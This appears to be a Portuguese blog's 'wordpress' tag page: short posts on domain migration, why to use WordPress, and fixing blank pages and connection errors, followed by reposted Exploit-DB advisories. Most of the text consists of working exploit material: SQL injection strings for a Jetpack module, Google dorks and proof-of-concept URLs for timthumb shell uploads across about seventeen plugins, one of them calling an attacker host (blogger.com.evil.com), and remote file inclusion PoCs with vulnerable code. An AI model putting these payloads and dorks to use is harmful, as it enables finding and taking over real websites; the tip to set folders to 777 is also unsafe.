Browsed by
Tag: wordpress

Migrando WordPress de Domínio

Migrando WordPress de Domínio

Se deseja mudar o domínio ou está interessado em fazer um backup e instalar em um servidor local do WordPress, será necessário fazer a troca de endereço do blog.

Além da cópia de todos os arquivos, será necessário atualizar algumas informações no banco de dados para fazer a troca de domínios. Para isso a maneira mais rápida é através da edição do banco de dados, veja a seguir o passo a passo de como fazê-lo de maneira prática, rápida e totalmente segura.

Read More Read More

Por que criar seu site em WordPress?

Por que criar seu site em WordPress?

Mesmo que você não seja um entendido no assunto, provavelmente já ouviu falar do WordPress. A plataforma é hoje a mais popular do mundo para a construção e desenvolvimento de websites, desde blogs ou sites corporativos até complexos sistemas e lojas virtuais.

Mas o que é o WordPress afinal?

Bem, antes de tudo, é preciso diferenciar o WordPress.com, que é uma plataforma online na qual você pode montar, gratuitamente, seu blog (como o Blogger ou o Tumblr), do WordPress.org. Nesse segundo website, é possível fazer o download de um arquivo ZIP que contém a instalação do sistema WordPress – é sobre ele que o seu site é construído.

O webmaster instala esse pacote do WordPress.org em seu serviço de webhost e, a partir dele, poderá criar um banco de dados para seu website e começar a montá-lo, inserindo ou modificando funcionalidades e alterando o chamado tema, que é a “cara” que o seu website vai ter.

Read More Read More

Blank Pages no WordPress, como sanar?

Blank Pages no WordPress, como sanar?

Passos para Sanar o Problema:

 

1 – Entre no WHM como root,

2 – Siga os menus e submenus (->)  Home (Início) -> Service Configuration -> PHP Configuration Editor,

3 – Localize o item Memory_Limit, esse deve possuir PELO MENOS 320mb (sim, há plugins pesados que consomem muita ram),

4 – Localize Upload_max_filesize, apesar de não influenciar aqui, no momento de uploads você pode se dar mal, deixe pelo menos 500MB (nossa hospedagem permite 2gb de upload),

5 – Localize Max_execution_time, deixe pelo menos 600s (para uploads longos ou processos de plugins será de suma importância ter execução longa),

6 – Localize Max_input_time e deixe pelo menos 300s.

 

De todos os pontos que citamos, os 2 principais para sanar o problema são MEMORY_LIMIT e Max_Execution_Time.

 

Fonte: http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/

Qualquer conexão com WordPress vem o erro ao XXX wordpress Ocorreu um erro inesperado.

Qualquer conexão com WordPress vem o erro ao XXX wordpress Ocorreu um erro inesperado.

Se você está recebendo a mensagem -> Ocorreu um erro inesperado (unexpected error) <— ao tentar fazer QUALQUER coisa remota do wordpress (instalar uma versão, atualizar um plugin, instalar um plugin, ver o Akismet e etc) nem se preocupe, a saída é simples e clara:

1 – Veja se a porta de saída 80 está liberada no seu firewall (bom deixar também a 443 de SSL),

2 – Veja se as pastas do wordpress estão com permissão correta (755 sob suExec ou 777 em DSO sem suExec), assim como arquivos php com permissões corretas -> 644.

3 – Caso os dois pontos acima estejam ok mande o admin do servidor fazer um teste, no arquivo /etc/resolv.conf mande colocar no começo do arquivo:

nameserver 8.8.8.8

nameserver 8.8.4.4

Esses dois nameservers resolvem publicamente usando infra-estrutura “fraquinha da Google”.

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Dica de segurança: Por que devo atualizar meu WordPress, Joomla, Drupal ou qualquer gestor de conteúdos web?

Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo:

http://icentral.com.br/blog/qual-motivo-de-atualizar-um-cms-no-meu-host-quer-seja-wordpress-joomla-drupal-e-etc/

WordPress jetpack plugin SQL Injection Vulnerability

WordPress jetpack plugin SQL Injection Vulnerability

######################################################

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: WordPress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
######################################################
*DESCRIPTION
Discovered a vulnerability in  jetpack, WordPress Plugin,
vulnerability is SQL injection.
File:wp-content/plugins/jetpack/modules/sharedaddy.php
Exploit: id=-1; or 1=if
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php

[GET][id=-1][MID((VERSION()),1,6)

 

Fonte: http://www.exploit-db.com/exploits/18126/

Multiple WordPress Plugin timthumb.php Vulnerabilites

Multiple WordPress Plugin timthumb.php Vulnerabilites


# Exploit Title: Multiple WordPress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)

---
Description
---
The following WordPress plugins reuse a vulnerable version of the timthumb.php library.

By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.

Reference: http://www.exploit-db.com/exploits/17602/

# Plugin: Category Grid View Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-grid-view-gallery
# Software Link: http://wordpress.org/extend/plugins/category-grid-view-gallery/download/
# Version: 0.1.1

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/category-grid-view-gallery/includes/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-grid-view-gallery/cache/externel_md5(src).php

# Plugin: Auto Attachments WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/auto-attachments
# Software Link: http://wordpress.org/extend/plugins/auto-attachments/download/
# Version: 0.2.9

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/auto-attachments/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/auto-attachments/cache/external_md5(src).php

# Plugin: WP Marketplace WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/wp-marketplace
# Software Link: http://wordpress.org/extend/plugins/wp-marketplace/download/
# Version: 1.1.0

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/wp-marketplace/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/wp-marketplace/libs/cache/external_md5(src).php

# Plugin: DP Thumbnail WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/dp-thumbnail
# Software Link: http://wordpress.org/extend/plugins/dp-thumbnail/download/
# Version: 1.0

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/dp-thumbnail/timthumb/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/dp-thumbnail/timthumb/cache/external_md5(src).php

# Plugin: Vk Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/vk-gallery
# Software Link: http://wordpress.org/extend/plugins/vk-gallery/download/
# Version: 1.1.0

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/vk-gallery/lib/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/vk-gallery/lib/cache/md5(src).php

# Plugin: Rekt Slideshow WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rekt-slideshow
# Software Link: http://wordpress.org/extend/plugins/rekt-slideshow/download/
# Version: 1.0.5

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/rekt-slideshow/picsize.php?src=MALICIOUS_URL

Must first base64 encode the URL.

The uploaded shell can be found at /wp-content/plugins/rekt-slideshow/cache/md5(src).php

# Plugin: CAC Featured Content WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cac-featured-content
# Software Link: http://wordpress.org/extend/plugins/cac-featured-content/download/
# Version: 0.8

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/cac-featured-content/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/cac-featured-content/temp/md5(src).php

# Plugin: Rent A Car WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/rent-a-car
# Software Link: http://wordpress.org/extend/plugins/rent-a-car/download/
# Version: 1.0
---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/rent-a-car/libs/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/rent-a-car/libs/cache/external_md5(src).php

# Plugin: LISL Last Image Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/lisl-last-image-slider
# Software Link: http://wordpress.org/extend/plugins/lisl-last-image-slider/download/
# Version: 1.0

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/lisl-last-image-slider/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/lisl-last-image-slider/cache/external_md5(src).php

# Plugin: Islidex WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/islidex
# Software Link: http://wordpress.org/extend/plugins/islidex/download/
# Version: 2.7

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/islidex/js/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/islidex/js/cache/md5(src).php

# Plugin: Kino Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/kino-gallery
# Software Link: http://wordpress.org/extend/plugins/kino-gallery/download/
# Version: 1.0

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/kino-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/kino-gallery/cache/external_md5(src).php

# Plugin: Cms Pack WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/cms-pack
# Software Link: http://wordpress.org/extend/plugins/cms-pack/download/
# Version: 1.3

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/cms-pack/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/uploads/cms-pack-cache/external_md5(src).php

# Plugin: A Gallery WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/a-gallery
# Software Link: http://wordpress.org/extend/plugins/a-gallery/download/
# Version: 0.9

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/a-gallery/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/a-gallery/cache/external_md5(src).php

# Plugin: Category List Portfolio Page WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/category-list-portfolio-page
# Software Link: http://wordpress.org/extend/plugins/category-list-portfolio-page/download/
# Version: 0.9

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/category-list-portfolio-page/scripts/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/category-list-portfolio-page/scripts/cache/external_md5(src).php

# Plugin: Really Easy Slider WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/really-easy-slider
# Software Link: http://wordpress.org/extend/plugins/really-easy-slider/download/
# Version: 0.1

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/really-easy-slider/inc/thumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/really-easy-slider/inc/cache/external_md5(src).php

# Plugin: Verve Meta Boxes WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/verve-meta-boxes
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/verve-meta-boxes/download/
# Version: 1.2.8

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/verve-meta-boxes/tools/timthumb.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/verve-meta-boxes/tools/cache/external_md5(src).php

# Plugin: User Avatar WordPress plugin shell upload vulnerability
# Google Dork: inurl:wp-content/plugins/user-avatar
# Software Link: http://wordpress.org/extend/plugins/user-avatar/download/
# Version: 1.3.7

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/user-avatar/user-avatar-pic.php?id=0&allowedSites[]=blogger.com&src=http://blogger.com.evil.com/poc.php

Requires register_globals to be enabled and at least one user account to have an avatar directory.

The uploaded shell can be found at /wp-content/uploads/avatars/$id/external_md5(src).php

# Plugin: Extend WordPress WordPress plugin Shell Upload vulnerability
# Google Dork: inurl:wp-content/plugins/extend-wordpress
# Software Link: http://wordpress.org/extend/plugins/extend-wordpress/download/
# Version: 1.3.7

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/extend-wordpress/helpers/timthumb/image.php?src=MALICIOUS_URL

The uploaded shell can be found at /wp-content/plugins/extend-wordpress/helpers/timthumb/cache/external_md5(src).php

Fonte: http://www.exploit-db.com/exploits/17872/

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion

WordPress Relocate Upload Plugin 0.14 Remote File Inclusion


# Exploit Title: Relocate Upload WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/relocate-upload
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
# Version: 0.14 (tested)

---
PoC
---
http://SERVER/db_unx_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI

---
Vulnerable Code
---
// Move folder request handled when called by GET AJAX
if (isset($_GET['ru_folder']))
{ // WP setup and function access
define('db_unx_USE_THEMES', false);
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter

Fonte: http://www.exploit-db.com/exploits/17869/

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion

WordPress Mini Mail Dashboard Widget Plugin 1.36 Remote File Inclusion


# Exploit Title: Mini Mail Dashboard Widget WordPress plugin RFI
# Google Dork: inurl:wp-content/plugins/mini-mail-dashboard-widget
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
# Software Link: http://wordpress.org/extend/plugins/mini-mail-dashboard-widget/download/
# Version: 1.36 (tested)


PoC

http://SERVER/db_unx_PATH/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=RFI (requires POSTing a file with ID wpmm-upload for this to work)


Vulnerable Code

if (isset($_FILES[‘wpmm-upload’])) {
// Create WordPress environmnt
require_once(urldecode($_REQUEST[‘abspath’]) . ‘wp-load.php’);

// Handle attachment
WPMiniMail::wpmm_upload();
}

Fonte: http://www.exploit-db.com/exploits/17868/